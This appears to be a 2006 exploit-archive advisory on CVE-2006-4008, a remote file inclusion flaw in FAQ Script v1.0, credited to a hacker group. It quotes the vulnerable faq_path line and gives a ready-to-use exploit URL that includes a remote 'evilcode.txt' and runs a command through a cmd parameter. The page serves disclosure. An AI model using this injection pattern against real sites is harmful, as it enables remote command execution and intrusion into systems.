FAQ Script Remote Command Execution

2006.08.08

Credit: botan linuxmail org

Risk: High

Local: No

Remote: Yes

CVE: CVE-2006-4008

CWE: CWE-Other

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

>>> Kurdish Security

>>> FAQ Script v1.0 Remote Command Execution

>>> Freedom For Ocalan

>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com

>>> Rish : High

>>> Class : Remote

>>> Script : FAQ Script

>>> Site : http://www.knusperleicht.at

Code :

//if the script is includet you have to set this path else the path must be $faq_path = "";

$faq_path = "";

http://www.site.com/[path]/index.php?faq_path=evilcode.txt?&cmd=id

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

FAQ Script Remote Command Execution

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

FAQ Script Remote Command Execution

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.